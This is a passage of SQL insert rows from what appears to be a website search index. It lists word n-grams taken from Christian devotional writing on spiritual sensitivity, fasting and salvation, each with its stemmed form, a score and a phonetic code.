(320303, 'rebuke wrong spirits', 'rebuk wrong spirits', 0, 1, 1.6667, 'R126521632', 2, '*'),
(320304, 'reduce emotionalism', 'reduc emotionalism', 0, 1, 1.6333, 'R32535425', 2, '*'),
(320305, 'reduce emotionalism don\'t', 'reduc emotionalism don', 0, 1, 1.8333, 'R32535425353', 2, '*'),
(320306, 'reduce spiritual', 'reduc spiritual', 0, 1, 1.5333, 'R321634', 1, '*'),
(320307, 'reduce spiritual sensitivity', 'reduc spiritual sensitivity', 0, 1, 1.9333, 'R321634252313', 1, '*'),
(320308, 'regular fasting', 'regular fasting', 0, 1, 1.5, 'R24612352', 2, '*'),
(320309, 'regular fasting fasting', 'regular fasting fasting', 0, 1, 1.7667, 'R2461235212352', 2, '*'),
(320310, 'regularly listening', 'regularli listening', 0, 1, 1.6333, 'R24642352', 2, '*'),
(320311, 'regularly listening to', 'regularli listening to', 0, 1, 1.7333, 'R246423523', 2, '*'),
(320312, 'regularly read', 'regularli read', 0, 1, 1.4667, 'R246463', 2, '*'),
(320313, 'regularly read the', 'regularli read the', 0, 1, 1.6, 'R246463', 2, '*'),
(320314, 'rule you', 'rule you', 0, 1, 1.2667, 'R400', 2, '*'),
(320315, 'rule you negative', 'rule you negative', 0, 1, 1.5667, 'R45231', 2, '*'),
(320316, 'sensitivity anger', 'sensit anger', 0, 1, 1.5667, 'S52313526', 2, '*'),
(320317, 'sensitivity anger wrath', 'sensit anger wrath', 0, 1, 1.7667, 'S523135263', 2, '*'),
(320318, 'sensitivity spend', 'sensit spend', 0, 1, 1.5667, 'S523132153', 2, '*'),
(320319, 'sensitivity spend more', 'sensit spend more', 0, 1, 1.7333, 'S52313215356', 2, '*'),
(320320, 'sensitivity stay', 'sensit stay', 0, 1, 1.5333, 'S5231323', 2, '*'),
(320321, 'sensitivity stay away', 'sensit stay away', 0, 1, 1.7, 'S5231323', 2, '*'),
(320322, 'should note', 'should note', 0, 1, 1.3667, 'S4353', 2, '*'),
(320323, 'should note that', 'should note that', 0, 1, 1.5333, 'S4353', 2, '*'),
(320324, 'sickness is', 'sick is', 0, 1, 1.3667, 'S520', 2, '*'),
(320325, 'sickness is losing', 'sick is losing', 0, 1, 1.6, 'S524252', 2, '*'),
(320326, 'signal', 'signal', 0, 0, 0.4, 'S540', 2, '*'),
(320327, 'signal divine', 'signal divine', 0, 1, 1.4333, 'S54315', 2, '*'),
(320328, 'signal divine signals', 'signal divine signals', 0, 1, 1.7, 'S543152542', 2, '*'),
(320329, 'signal the', 'signal the', 0, 1, 1.3333, 'S543', 2, '*'),
(320330, 'signal the attitude', 'signal the attitude', 0, 1, 1.6333, 'S543', 2, '*'),
(320331, 'signals', 'signal', 0, 0, 0.4667, 'S542', 4, '*'),
(320332, 'signals come', 'signal come', 0, 1, 1.4, 'S5425', 2, '*'),
(320333, 'signals come through', 'signal come through', 0, 1, 1.6667, 'S5425362', 2, '*'),
(320334, 'signs', 'sign', 0, 0, 0.3333, 'S520', 2, '*'),
(320335, 'signs of', 'sign of', 0, 1, 1.2667, 'S521', 2, '*'),
(320336, 'signs of spiritual', 'sign of spiritual', 0, 1, 1.6, 'S52121634', 2, '*'),
(320337, 'something spiritual', 'someth spiritual', 0, 1, 1.6333, 'S53521634', 2, '*'),
(320338, 'something spiritual you', 'someth spiritual you', 0, 1, 1.7667, 'S53521634', 2, '*'),
(320339, 'speaking in tongue', 'speak in tongue', 0, 1, 1.6, 'S12525352', 2, '*'),
(320340, 'spirit if', 'spirit if', 0, 1, 1.3, 'S1631', 2, '*'),
(320341, 'spirit if you\'re', 'spirit if you', 0, 1, 1.5333, 'S16316', 2, '*'),
(320342, 'spirit regular fasting', 'spirit regular fasting', 0, 1, 1.7333, 'S163624612352', 2, '*'),
(320343, 'spirit stop', 'spirit stop', 0, 1, 1.3667, 'S163231', 2, '*'),
(320344, 'spirit stop staying', 'spirit stop staying', 0, 1, 1.6333, 'S1632312352', 2, '*'),
(320345, 'spirit to grow', 'spirit to grow', 0, 1, 1.4667, 'S16326', 2, '*'),
(320346, 'spirits cast', 'spirit cast', 0, 1, 1.4, 'S16323', 2, '*'),
(320347, 'spirits cast down', 'spirit cast down', 0, 1, 1.5667, 'S163235', 2, '*'),
(320348, 'spiritual activities', 'spiritu activities', 0, 1, 1.6667, 'S163423132', 2, '*'),
(320349, 'spiritual activities majority', 'spiritu activities majority', 0, 1, 1.9667, 'S1634231325263', 2, '*'),
(320350, 'spiritual influences', 'spiritu influences', 0, 1, 1.6667, 'S163451452', 2, '*'),
(320351, 'spiritual influences false', 'spiritu influences false', 0, 1, 1.8667, 'S163451452142', 2, '*'),
(320352, 'spiritual sensitivity', 'spiritu sensitivity', 0, 1, 1.7, 'S1634252313', 2, '*'),
(320353, 'spiritual sensitivity anger', 'spiritu sensitivity anger', 0, 1, 1.9, 'S1634252313526', 2, '*'),
(320354, 'spiritual sensitivity spend', 'spiritu sensitivity spend', 0, 1, 1.9, 'S16342523132153', 2, '*'),
(320355, 'spiritual sensitivity stay', 'spiritu sensitivity stay', 0, 1, 1.8667, 'S163425231323', 2, '*'),
(320356, 'spiritual sickness', 'spiritu sickness', 0, 1, 1.6, 'S1634252', 2, '*'),
(320357, 'spiritual sickness is', 'spiritu sickness is', 0, 1, 1.7, 'S1634252', 2, '*'),
(320358, 'spiritual you', 'spiritu you', 0, 1, 1.4333, 'S1634', 2, '*'),
(320359, 'spiritual you are', 'spiritu you are', 0, 1, 1.5667, 'S16346', 2, '*'),
(320360, 'staying', 'stai', 0, 0, 0.4667, 'S352', 2, '*'),
(320361, 'staying around', 'stai around', 0, 1, 1.4667, 'S352653', 2, '*'),
(320362, 'staying around strange', 'stai around strange', 0, 1, 1.7333, 'S35265323652', 2, '*'),
(320363, 'stop staying', 'stop staying', 0, 1, 1.4, 'S312352', 2, '*'),
(320364, 'stop staying around', 'stop staying around', 0, 1, 1.6333, 'S312352653', 2, '*'),
(320365, 'strange spiritual', 'strang spiritual', 0, 1, 1.5667, 'S36521634', 2, '*'),
(320366, 'strange spiritual influences', 'strang spiritual influences', 0, 1, 1.9333, 'S3652163451452', 2, '*'),
(320367, 'strike', 'strike', 0, 0, 0.4, 'S362', 2, '*'),
(320368, 'strike don\'t', 'strike don', 0, 1, 1.4, 'S362353', 2, '*'),
(320369, 'strike don\'t use', 'strike don use', 0, 1, 1.5333, 'S3623532', 2, '*'),
(320370, 'struggling', 'struggl', 0, 0, 0.6667, 'S362452', 2, '*'),
(320371, 'struggling because', 'struggl because', 0, 1, 1.6, 'S36245212', 2, '*'),
(320372, 'struggling because they', 'struggl because they', 0, 1, 1.7667, 'S362452123', 2, '*'),
(320373, 'than your brain', 'than your brain', 0, 1, 1.5, 'T56165', 2, '*'),
(320374, 'that fasting', 'that fasting', 0, 1, 1.4, 'T12352', 2, '*'),
(320375, 'that fasting does', 'that fasting does', 0, 1, 1.5667, 'T1235232', 2, '*'),
(320376, 'that is against', 'that is against', 0, 1, 1.5, 'T2523', 2, '*'),
(320377, 'that operate', 'that operate', 0, 1, 1.4, 'T163', 2, '*'),
(320378, 'that operate in', 'that operate in', 0, 1, 1.5, 'T1635', 2, '*'),
(320379, 'the anointing by', 'the anointing by', 0, 1, 1.5333, 'T53521', 2, '*'),
(320380, 'the attitude', 'the attitude', 0, 1, 1.4, 'T000', 2, '*'),
(320381, 'the attitude of', 'the attitude of', 0, 1, 1.5, 'T100', 2, '*'),
(320382, 'the bible regularly', 'the bible regularly', 0, 1, 1.6333, 'T1462464', 2, '*'),
(320383, 'the frequency', 'the frequency', 0, 1, 1.4333, 'T16252', 2, '*'),
(320384, 'the frequency of', 'the frequency of', 0, 1, 1.5333, 'T162521', 2, '*'),
(320385, 'the frequency that', 'the frequency that', 0, 1, 1.6, 'T162523', 2, '*'),
(320386, 'the knowledge', 'the knowledge', 0, 1, 1.4333, 'T25432', 2, '*'),
(320387, 'the knowledge of', 'the knowledge of', 0, 1, 1.5333, 'T254321', 2, '*'),
(320388, 'the lord until', 'the lord until', 0, 1, 1.4667, 'T463534', 2, '*'),
(320389, 'the signs', 'the signs', 0, 1, 1.3, 'T252', 2, '*'),
(320390, 'the signs of', 'the signs of', 0, 1, 1.4, 'T2521', 2, '*'),
(320391, 'the spirit to', 'the spirit to', 0, 1, 1.4333, 'T2163', 2, '*'),
(320392, 'their ministry', 'their ministry', 0, 1, 1.4667, 'T65236', 2, '*'),
(320393, 'their ministry increase', 'their ministry increase', 0, 1, 1.7667, 'T652365262', 2, '*'),
(320394, 'them and attend', 'them and attend', 0, 1, 1.5, 'T5353', 2, '*'),
(320395, 'them you', 'them you', 0, 1, 1.2667, 'T500', 2, '*'),
(320396, 'them you should', 'them you should', 0, 1, 1.5, 'T5243', 2, '*'),
(320397, 'they can\'t', 'thei can', 0, 1, 1.3333, 'T253', 2, '*'),
(320398, 'they can\'t get', 'thei can get', 0, 1, 1.4667, 'T25323', 2, '*'),
(320399, 'through in', 'through in', 0, 1, 1.3333, 'T625', 2, '*'),
(320400, 'through in a', 'through in a', 0, 1, 1.4, 'T625', 2, '*'),
(320401, 'through your', 'through your', 0, 1, 1.4, 'T626', 3, '*'),
(320402, 'through your conscience', 'through your conscience', 0, 1, 1.7667, 'T62625252', 2, '*'),
(320403, 'time speaking', 'time speaking', 0, 1, 1.4333, 'T521252', 2, '*'),
(320404, 'time speaking in', 'time speaking in', 0, 1, 1.5333, 'T5212525', 2, '*'),
(320405, 'to bribe', 'to bribe', 0, 1, 1.2667, 'T161', 2, '*'),
(320406, 'to bribe god', 'to bribe god', 0, 1, 1.4, 'T16123', 2, '*'),
(320407, 'to divine signal', 'to divine signal', 0, 1, 1.5333, 'T15254', 2, '*'),
(320408, 'to grow in', 'to grow in', 0, 1, 1.3333, 'T265', 2, '*'),
(320409, 'to increase', 'to increase', 0, 1, 1.3667, 'T5262', 2, '*'),
(320410, 'to increase your', 'to increase your', 0, 1, 1.5333, 'T52626', 2, '*'),
(320411, 'to messages', 'to messages', 0, 1, 1.3667, 'T520', 2, '*'),
(320412, 'to rebuke', 'to rebuke', 0, 1, 1.3, 'T612', 2, '*'),
(320413, 'to rebuke wrong', 'to rebuke wrong', 0, 1, 1.5, 'T612652', 2, '*'),
(320414, 'to spiritual', 'to spiritual', 0, 1, 1.4, 'T21634', 2, '*'),
(320415, 'to spiritual activities', 'to spiritual activities', 0, 1, 1.7667, 'T2163423132', 2, '*'),
(320416, 'to the frequency', 'to the frequency', 0, 1, 1.5333, 'T16252', 2, '*'),
(320417, 'to them and', 'to them and', 0, 1, 1.3667, 'T530', 2, '*'),
(320418, 'to walk with', 'to walk with', 0, 1, 1.4, 'T423', 2, '*'),
(320419, 'today i want', 'todai i want', 0, 1, 1.4, 'T530', 2, '*'),
(320420, 'tongue', 'tongu', 0, 0, 0.4, 'T520', 2, '*'),
(320421, 'tongue instant', 'tongu instant', 0, 1, 1.4667, 'T5252353', 2, '*'),
(320422, 'tongue instant obedience', 'tongu instant obedience', 0, 1, 1.8, 'T52523531352', 2, '*'),
(320423, 'un-anointed', 'un-anoint', 0, 0, 0.7333, 'U530', 1, '*'),
(320424, 'un-anointed atmospheres', 'un-anoint atmospheres', 0, 1, 1.7667, 'U5352162', 1, '*'),
(320425, 'un-anointed atmospheres create', 'un-anoint atmospheres create', 0, 1, 2, 'U535216263', 1, '*'),
(320426, 'until your', 'until your', 0, 1, 1.3333, 'U5346', 2, '*'),
(320427, 'until your heart', 'until your heart', 0, 1, 1.5333, 'U53463', 2, '*'),
(320428, 'use fasting', 'us fasting', 0, 1, 1.3667, 'U212352', 2, '*'),
(320429, 'use fasting to', 'us fasting to', 0, 1, 1.4667, 'U2123523', 2, '*'),
(320430, 'walk with the', 'walk with the', 0, 1, 1.4333, 'W423', 2, '*'),
(320431, 'ways to increase', 'wai to increase', 0, 1, 1.5333, 'W235262', 2, '*'),
(320432, 'will signal', 'will signal', 0, 1, 1.3667, 'W4254', 2, '*'),
(320433, 'will signal the', 'will signal the', 0, 1, 1.5, 'W42543', 2, '*'),
(320434, 'with authentic', 'with authentic', 0, 1, 1.4667, 'W3532', 3, '*'),
(320435, 'with authentic gifts', 'with authentic gifts', 0, 1, 1.6667, 'W3532132', 2, '*'),
(320436, 'with them you', 'with them you', 0, 1, 1.4333, 'W350', 2, '*'),
(320437, 'with you ways', 'with you ways', 0, 1, 1.4333, 'W320', 2, '*'),
(320438, 'words affect', 'word affect', 0, 1, 1.4, 'W632123', 2, '*'),
(320439, 'words affect your', 'word affect your', 0, 1, 1.5667, 'W6321236', 2, '*'),
(320440, 'worship praise', 'worship praise', 0, 1, 1.4667, 'W62162', 2, '*'),
(320441, 'worship praise and', 'worship praise and', 0, 1, 1.6, 'W6216253', 2, '*'),
(320442, 'wrath malice', 'wrath malice', 0, 1, 1.4, 'W63542', 2, '*'),
(320443, 'wrath malice and', 'wrath malice and', 0, 1, 1.5333, 'W6354253', 1, '*'),
(320444, 'wrong spirits', 'wrong spirits', 0, 1, 1.4333, 'W6521632', 2, '*'),
(320445, 'wrong spirits cast', 'wrong spirits cast', 0, 1, 1.6, 'W65216323', 2, '*'),
(320446, 'year increase', 'year increase', 0, 1, 1.4333, 'Y65262', 2, '*'),
(320447, 'year increase your', 'year increase your', 0, 1, 1.6, 'Y652626', 2, '*'),
(320448, 'you can increase', 'you can increase', 0, 1, 1.5333, 'Y25262', 2, '*'),
(320449, 'you fasting', 'you fasting', 0, 1, 1.3667, 'Y12352', 2, '*'),
(320450, 'you fasting fine-tunes', 'you fasting fine-tunes', 0, 1, 1.7333, 'Y1235215352', 2, '*'),
(320451, 'you listen', 'you listen', 0, 1, 1.3333, 'Y4235', 2, '*'),
(320452, 'you listen to', 'you listen to', 0, 1, 1.4333, 'Y42353', 2, '*'),
(320453, 'you negative', 'you negative', 0, 1, 1.4, 'Y5231', 2, '*'),
(320454, 'you negative passions', 'you negative passions', 0, 1, 1.7, 'Y5231252', 1, '*'),
(320455, 'you reduce', 'you reduce', 0, 1, 1.3333, 'Y632', 2, '*'),
(320456, 'you reduce emotionalism', 'you reduce emotionalism', 0, 1, 1.7667, 'Y632535425', 2, '*'),
(320457, 'you should note', 'you should note', 0, 1, 1.5, 'Y24353', 2, '*'),
(320458, 'you ways', 'you ways', 0, 1, 1.2667, 'Y200', 2, '*'),
(320459, 'you ways that', 'you ways that', 0, 1, 1.4333, 'Y230', 2, '*'),
(320460, 'you\'re not', 'you not', 0, 1, 1.3333, 'Y653', 2, '*'),
(320461, 'you\'re not concentrating', 'you not concentrating', 0, 1, 1.8, 'Y653252536352', 2, '*'),
(320462, 'your body language', 'your body language', 0, 1, 1.6, 'Y613452', 2, '*'),
(320463, 'your brain', 'your brain', 0, 1, 1.3333, 'Y6165', 2, '*'),
(320464, 'your brain body', 'your brain body', 0, 1, 1.5, 'Y616513', 2, '*'),
(320465, 'your confession of', 'your confession of', 0, 1, 1.6, 'Y6251251', 3, '*'),
(320466, 'your conscience learn', 'your conscience learn', 0, 1, 1.7, 'Y625252465', 1, '*'),
(320467, 'your emotions', 'your emotions', 0, 1, 1.4333, 'Y65352', 2, '*'),
(320468, 'your emotions or', 'your emotions or', 0, 1, 1.5333, 'Y653526', 2, '*'),
(320469, 'your frequency', 'your frequency', 0, 1, 1.4667, 'Y616252', 2, '*'),
(320470, 'your frequency to', 'your frequency to', 0, 1, 1.5667, 'Y6162523', 2, '*'),
(320471, 'your heart is', 'your heart is', 0, 1, 1.4333, 'Y632', 2, '*'),
(320472, 'your intake', 'your intake', 0, 1, 1.3667, 'Y6532', 2, '*'),
(320473, 'your intake of', 'your intake of', 0, 1, 1.4667, 'Y65321', 2, '*'),
(320474, 'your sensitivity', 'your sensitivity', 0, 1, 1.5333, 'Y6252313', 3, '*'),
(320475, 'your spiritual sensitivity', 'your spiritual sensitivity', 0, 1, 1.8667, 'Y621634252313', 2, '*'),
(320476, 'your words affect', 'your words affect', 0, 1, 1.5667, 'Y632123', 2, '*'),
(320512, '\'yes\'', 'ye', 0, 0, 0.3333, 'Y200', 1, '*'),
(320513, '\'yes\' to', 'ye to', 0, 1, 1.2667, 'Y230', 1, '*'),
(320514, '\'yes\' to all', 'ye to all', 0, 1, 1.4, 'Y234', 1, '*'),
(320515, '-', '-', 0, 0, 0.1, '', 1, '*'),
(320516, '- for', '- for', 0, 1, 1.1667, 'F600', 1, '*'),
(320517, '- for there', '- for there', 0, 1, 1.3667, 'F636', 1, '*'),
(320518, '1 15 realize', '1 15 realize', 0, 1, 1.4, 'R420', 1, '*'),
(320519, '1 tim 1', '1 tim 1', 0, 1, 1.2333, 'T500', 1, '*'),
(320520, '1 tim 2', '1 tim 2', 0, 1, 1.2333, 'T500', 1, '*'),
(320521, '10 9-10', '10 9-10', 0, 1, 1.2333, '', 1, '*'),
(320522, '10 9-10 “that', '10 9-10 “that', 0, 1, 1.4333, '“300', 1, '*'),
(320523, '15 realize', '15 realize', 0, 1, 1.3333, 'R420', 1, '*'),
(320524, '15 realize through', '15 realize through', 0, 1, 1.6, 'R42362', 1, '*'),
(320525, '17 be irrevocably', '17 be irrevocably', 0, 1, 1.5667, 'B61214', 1, '*'),
(320526, '19 some', '19 some', 0, 1, 1.2333, 'S500', 1, '*'),
(320527, '19 some people', '19 some people', 0, 1, 1.4667, 'S514', 1, '*'),
(320528, '2 5-6', '2 5-6', 0, 1, 1.1667, '', 1, '*'),
(320529, '2 5-6 “this', '2 5-6 “this', 0, 1, 1.3667, '“320', 1, '*'),
(320530, '23 receive', '23 receive', 0, 1, 1.3333, 'R210', 1, '*'),
(320531, '23 receive the', '23 receive the', 0, 1, 1.4667, 'R213', 1, '*'),
(320532, '23 who', '23 who', 0, 1, 1.2, 'W000', 1, '*'),
(320533, '23 who then', '23 who then', 0, 1, 1.3667, 'W350', 1, '*'),
(320534, '3 19 some', '3 19 some', 0, 1, 1.3, 'S500', 1, '*'),
(320535, '3 23', '3 23', 0, 1, 1.1333, '', 1, '*'),
(320536, '3 23 receive', '3 23 receive', 0, 1, 1.4, 'R210', 1, '*'),
(320537, '3 23 who', '3 23 who', 0, 1, 1.2667, 'W000', 1, '*'),
(320538, '35-38', '35-38', 0, 0, 0.5, '', 1, '*'),
(320539, '35-38 make', '35-38 make', 0, 1, 1.3333, 'M200', 1, '*'),
(320540, '35-38 make a', '35-38 make a', 0, 1, 1.4, 'M200', 1, '*'),
(320541, '5 17 be', '5 17 be', 0, 1, 1.2333, 'B000', 1, '*'),
(320542, '5-6', '5-6', 0, 0, 0.3, '', 1, '*'),
(320543, '5-6 “this', '5-6 “this', 0, 1, 1.3, '“320', 1, '*'),
(320544, '5-6 “this is', '5-6 “this is', 0, 1, 1.4, '“320', 1, '*'),
(320545, '6 if', '6 if', 0, 1, 1.1333, 'I100', 1, '*'),
(320546, '6 if you', '6 if you', 0, 1, 1.2667, 'I100', 1, '*'),
(320547, '64', '64', 0, 0, 0.2, '', 1, '*'),
(320548, '64 6a', '64 6a', 0, 1, 1.1667, 'A000', 1, '*'),
(320549, '64 6a says', '64 6a says', 0, 1, 1.3333, 'A200', 1, '*'),
(320550, '6a', '6a', 0, 0, 0.1333, 'A000', 1, '*'),
(320551, '6a says', '6a says', 0, 1, 1.2333, 'A200', 1, '*'),
(320552, '6a says “but', '6a says “but', 0, 1, 1.4, 'A213', 1, '*'),
(320553, '8 who', '8 who', 0, 1, 1.1667, 'W000', 1, '*'),
(320554, '8 who is', '8 who is', 0, 1, 1.2667, 'W200', 1, '*'),
(320555, '9 35-38', '9 35-38', 0, 1, 1.2333, '', 1, '*'),
(320556, '9 35-38 make', '9 35-38 make', 0, 1, 1.4, 'M200', 1, '*'),
(320557, '9 6 if', '9 6 if', 0, 1, 1.2, 'I100', 1, '*'),
(320558, '9-10 “that', '9-10 “that', 0, 1, 1.3333, '“300', 1, '*'),
(320559, '9-10 “that if', '9-10 “that if', 0, 1, 1.4333, '“310', 1, '*'),
(320560, 'a born', 'a born', 0, 1, 1.2, 'A165', 2, '*'),
(320561, 'a born again', 'a born again', 0, 1, 1.4, 'A16525', 2, '*'),
(320562, 'a changed', 'a changed', 0, 1, 1.3, 'A2523', 1, '*'),
(320563, 'a changed life', 'a changed life', 0, 1, 1.4667, 'A252341', 1, '*'),
(320564, 'a credible', 'a credible', 0, 1, 1.3333, 'A26314', 1, '*'),
(320565, 'a credible evidence', 'a credible evidence', 0, 1, 1.6333, 'A263141352', 1, '*'),
(320566, 'a faithful saying', 'a faithful saying', 0, 1, 1.5667, 'A1314252', 1, '*'),
(320567, 'a major question', 'a major question', 0, 1, 1.5333, 'A526235', 1, '*'),
(320568, 'a new leaf', 'a new leaf', 0, 1, 1.3333, 'A541', 1, '*'),
(320569, 'a personal saviour', 'a personal saviour', 0, 1, 1.6, 'A16254216', 1, '*'),
(320570, 'a ransom', 'a ransom', 0, 1, 1.2667, 'A6525', 1, '*'),
(320571, 'a ransom for', 'a ransom for', 0, 1, 1.4, 'A652516', 1, '*'),
(320572, 'a sinner and', 'a sinner and', 0, 1, 1.4, 'A25653', 1, '*'),
(320573, 'a sinner “for', 'a sinner “for', 0, 1, 1.4333, 'A25616', 1, '*'),
(320574, 'a spiritual willful', 'a spiritual willful', 0, 1, 1.6333, 'A2163414', 1, '*'),
(320575, 'about jesus', 'about jesus', 0, 1, 1.3667, 'A132', 1, '*'),
(320576, 'about jesus being', 'about jesus being', 0, 1, 1.5667, 'A132152', 1, '*'),
(320577, 'about jesus rom', 'about jesus rom', 0, 1, 1.5, 'A13265', 1, '*'),
(320578, 'accept christ', 'accept christ', 0, 1, 1.4333, 'A2132623', 1, '*'),
(320579, 'accept christ into', 'accept christ into', 0, 1, 1.6, 'A213262353', 1, '*'),
(320580, 'accept jesus', 'accept jesus', 0, 1, 1.4, 'A2132', 1, '*'),
(320581, 'accept jesus as', 'accept jesus as', 0, 1, 1.5, 'A2132', 1, '*'),
(320582, 'acceptance', 'accept', 0, 0, 0.6667, 'A21352', 1, '*'),
(320583, 'acceptance of', 'accept of', 0, 1, 1.4333, 'A213521', 1, '*'),
(320584, 'acceptance of jesus', 'accept of jesus', 0, 1, 1.6333, 'A2135212', 1, '*'),
(320585, 'acceptation', 'accept', 0, 0, 0.7333, 'A2135', 1, '*'),
(320586, 'acceptation that', 'accept that', 0, 1, 1.5333, 'A21353', 1, '*'),
(320587, 'acceptation that christ', 'accept that christ', 0, 1, 1.7667, 'A213532623', 1, '*'),
(320588, 'act 3', 'act 3', 0, 1, 1.1667, 'A230', 1, '*'),
(320589, 'act 3 19', 'act 3 19', 0, 1, 1.2667, 'A230', 1, '*'),
(320590, 'admitted', 'admit', 0, 0, 0.5333, 'A353', 1, '*'),
(320591, 'admitted into', 'admit into', 0, 1, 1.4333, 'A35353', 1, '*'),
(320592, 'admitted into higher', 'admit into higher', 0, 1, 1.6667, 'A3535326', 1, '*'),
(320593, 'again church', 'again church', 0, 1, 1.4, 'A25262', 1, '*'),
(320594, 'again church do', 'again church do', 0, 1, 1.5, 'A252623', 1, '*'),
(320595, 'again friends', 'again friends', 0, 1, 1.4333, 'A2516532', 1, '*'),
(320596, 'again friends are', 'again friends are', 0, 1, 1.5667, 'A25165326', 1, '*'),
(320597, 'aged', 'ag', 0, 0, 0.2667, 'A230', 1, '*'),
(320598, 'aged male', 'ag male', 0, 1, 1.3, 'A2354', 1, '*'),
(320599, 'aged male and', 'ag male and', 0, 1, 1.4333, 'A235453', 1, '*'),
(320600, 'all acceptation', 'all acceptation', 0, 1, 1.5, 'A42135', 1, '*'),
(320601, 'all acceptation that', 'all acceptation that', 0, 1, 1.6667, 'A421353', 1, '*'),
(320602, 'all as', 'all as', 0, 1, 1.2, 'A420', 1, '*'),
(320603, 'all as an', 'all as an', 0, 1, 1.3, 'A425', 1, '*'),
(320604, 'all have', 'all have', 0, 1, 1.2667, 'A410', 1, '*'),
(320605, 'all have sinned', 'all have sinned', 0, 1, 1.5, 'A41253', 1, '*'),
(320606, 'all issues', 'all issues', 0, 1, 1.3333, 'A420', 1, '*'),
(320607, 'all issues of', 'all issues of', 0, 1, 1.4333, 'A421', 1, '*'),
(320608, 'all my sins', 'all my sins', 0, 1, 1.3667, 'A45252', 1, '*'),
(320609, 'all need', 'all need', 0, 1, 1.2667, 'A453', 1, '*'),
(320610, 'all need to', 'all need to', 0, 1, 1.3667, 'A453', 1, '*'),
(320611, 'all our', 'all our', 0, 1, 1.2333, 'A460', 2, '*'),
(320612, 'all our righteousness', 'all our righteousness', 0, 1, 1.7, 'A4623252', 1, '*'),
(320613, 'all sinful', 'all sinful', 0, 1, 1.3333, 'A42514', 1, '*'),
(320614, 'all sinful habits', 'all sinful habits', 0, 1, 1.5667, 'A42514132', 1, '*'),
(320615, 'all these cannot', 'all these cannot', 0, 1, 1.5333, 'A43253', 1, '*'),
(320616, 'all to', 'all to', 0, 1, 1.2, 'A430', 1, '*'),
(320617, 'all to be', 'all to be', 0, 1, 1.3, 'A431', 1, '*'),
(320618, 'am chief', 'am chief', 0, 1, 1.2667, 'A521', 1, '*'),
(320619, 'am chief 1', 'am chief 1', 0, 1, 1.3333, 'A521', 1, '*'),
(320620, 'am i genuinely', 'am i genuinely', 0, 1, 1.4667, 'A5254', 1, '*'),
(320621, 'an unclean', 'an unclean', 0, 1, 1.3333, 'A5245', 1, '*'),
(320622, 'an unclean thing', 'an unclean thing', 0, 1, 1.5333, 'A5245352', 1, '*'),
(320623, 'and acceptance', 'and acceptance', 0, 1, 1.4667, 'A5321352', 1, '*'),
(320624, 'and acceptance of', 'and acceptance of', 0, 1, 1.5667, 'A53213521', 1, '*'),
(320625, 'and all our', 'and all our', 0, 1, 1.3667, 'A5346', 1, '*'),
(320626, 'and all sinful', 'and all sinful', 0, 1, 1.4667, 'A5342514', 1, '*'),
(320627, 'and attitude to', 'and attitude to', 0, 1, 1.5, 'A530', 1, '*'),
(320628, 'and black', 'and black', 0, 1, 1.3, 'A53142', 1, '*'),
(320629, 'and black learned', 'and black learned', 0, 1, 1.5667, 'A531424653', 1, '*'),
(320630, 'and bred', 'and bred', 0, 1, 1.2667, 'A53163', 1, '*'),
(320631, 'and bred do', 'and bred do', 0, 1, 1.3667, 'A53163', 1, '*'),
(320632, 'and cannot', 'and cannot', 0, 1, 1.3333, 'A53253', 1, '*'),
(320633, 'and cannot save', 'and cannot save', 0, 1, 1.5, 'A5325321', 1, '*'),
(320634, 'and check', 'and check', 0, 1, 1.3, 'A532', 1, '*'),
(320635, 'and check it', 'and check it', 0, 1, 1.4, 'A5323', 1, '*'),
(320636, 'and come', 'and come', 0, 1, 1.2667, 'A5325', 1, '*'),
(320637, 'and come “short', 'and come “short', 0, 1, 1.5, 'A5325263', 1, '*'),
(320638, 'and confess', 'and confess', 0, 1, 1.3667, 'A532512', 1, '*'),
(320639, 'and confess with', 'and confess with', 0, 1, 1.5333, 'A5325123', 1, '*'),
(320640, 'and doing', 'and doing', 0, 1, 1.3, 'A5352', 1, '*'),
(320641, 'and doing penance', 'and doing penance', 0, 1, 1.5667, 'A5352152', 1, '*'),
(320642, 'and female', 'and female', 0, 1, 1.3333, 'A53154', 1, '*'),
(320643, 'and female white', 'and female white', 0, 1, 1.5333, 'A531543', 1, '*'),
(320644, 'and have come', 'and have come', 0, 1, 1.4333, 'A53125', 1, '*'),
(320645, 'and his will', 'and his will', 0, 1, 1.4, 'A5324', 1, '*'),
(320646, 'and illiterate', 'and illiterate', 0, 1, 1.4667, 'A534363', 1, '*'),
(320647, 'and illiterate etc', 'and illiterate etc', 0, 1, 1.6, 'A5343632', 1, '*'),
(320648, 'and make me', 'and make me', 0, 1, 1.3667, 'A53525', 1, '*'),
(320649, 'and many', 'and many', 0, 1, 1.2667, 'A535', 1, '*'),
(320650, 'and many in', 'and many in', 0, 1, 1.3667, 'A535', 1, '*'),
(320651, 'and men the', 'and men the', 0, 1, 1.3667, 'A5353', 1, '*'),
(320652, 'and on', 'and on', 0, 1, 1.2, 'A535', 1, '*'),
(320653, 'and on time', 'and on time', 0, 1, 1.3667, 'A53535', 1, '*'),
(320654, 'and one mediator', 'and one mediator', 0, 1, 1.5333, 'A53536', 1, '*'),
(320655, 'and projects', 'and projects', 0, 1, 1.4, 'A5316232', 1, '*'),
(320656, 'and projects are', 'and projects are', 0, 1, 1.5333, 'A53162326', 1, '*'),
(320657, 'and proves', 'and proves', 0, 1, 1.3333, 'A531612', 1, '*'),
(320658, 'and proves it', 'and proves it', 0, 1, 1.4333, 'A5316123', 1, '*'),
(320659, 'and saviour forgive', 'and saviour forgive', 0, 1, 1.6333, 'A532161621', 1, '*'),
(320660, 'and saviour “repent', 'and saviour “repent', 0, 1, 1.6333, 'A53216153', 1, '*'),
(320661, 'and shalt', 'and shalt', 0, 1, 1.3, 'A53243', 1, '*'),
(320662, 'and shalt believe', 'and shalt believe', 0, 1, 1.5667, 'A53243141', 1, '*'),
(320663, 'and the aged', 'and the aged', 0, 1, 1.4, 'A5323', 1, '*'),
(320664, 'and the sinful', 'and the sinful', 0, 1, 1.4667, 'A532514', 1, '*'),
(320665, 'and turn', 'and turn', 0, 1, 1.2667, 'A5365', 1, '*'),
(320666, 'and turn to', 'and turn to', 0, 1, 1.3667, 'A53653', 1, '*'),
(320667, 'and when it', 'and when it', 0, 1, 1.3667, 'A5353', 1, '*'),
(320668, 'and with the', 'and with the', 0, 1, 1.4, 'A530', 1, '*'),
(320669, 'and word', 'and word', 0, 1, 1.2667, 'A5363', 1, '*'),
(320670, 'and word in', 'and word in', 0, 1, 1.3667, 'A53635', 1, '*'),
(320671, 'and worthy', 'and worthy', 0, 1, 1.3333, 'A5363', 1, '*'),
(320672, 'and worthy of', 'and worthy of', 0, 1, 1.4333, 'A53631', 1, '*'),
